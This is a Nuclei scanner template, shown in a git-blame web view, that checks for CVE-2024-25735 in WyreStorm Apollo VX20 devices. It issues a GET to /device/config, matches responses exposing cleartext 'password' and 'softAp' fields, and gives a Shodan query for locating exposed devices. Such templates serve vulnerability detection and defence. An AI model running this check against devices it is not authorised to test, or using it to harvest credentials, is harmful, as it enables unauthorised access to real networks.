nuclei-templates/http/cves/2024/CVE-2024-25735.yaml

41 lines
1.3 KiB
YAML
Raw Normal View History

2024-02-12 22:32:40 +00:00
id: CVE-2024-25735
2024-02-13 04:32:11 +00:00
2024-02-12 22:32:40 +00:00
info:
2024-02-13 04:38:52 +00:00
name: WyreStorm Apollo VX20 - Information Disclosure
2024-02-12 22:32:40 +00:00
author: johnk3r
severity: high
2024-02-13 04:32:11 +00:00
description: |
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.
2024-02-12 22:32:40 +00:00
reference:
- https://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt
2024-02-13 04:32:11 +00:00
- https://packetstormsecurity.com/files/cve/CVE-2024-25735
2024-02-12 22:32:40 +00:00
metadata:
verified: true
max-request: 1
2024-02-13 04:32:11 +00:00
vendor: wyrestorm
product: apollo vx20
2024-02-12 22:32:40 +00:00
shodan-query: ssl:"WyreStorm Apollo VX20"
tags: packetstorm,cve,cve2024,wyrestorm,info-leak
2024-02-12 22:32:40 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/device/config"
2024-02-12 22:34:42 +00:00
matchers-condition: and
2024-02-12 22:32:40 +00:00
matchers:
- type: word
words:
2024-02-13 04:32:11 +00:00
- '"password":'
- '"softAp":'
condition: and
2024-02-12 22:34:42 +00:00
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4a0a0047304502207a882963d4a3f8ed561c7c8c0babf15f2b40b9dcd1aa09112156fa30a9e53b89022100a0a1e3ee792bbbe946761e559cb03fe55fb5b61de9e9eafa674e7cefeaa34a68:922c64590222798bb761d5b6d8e72950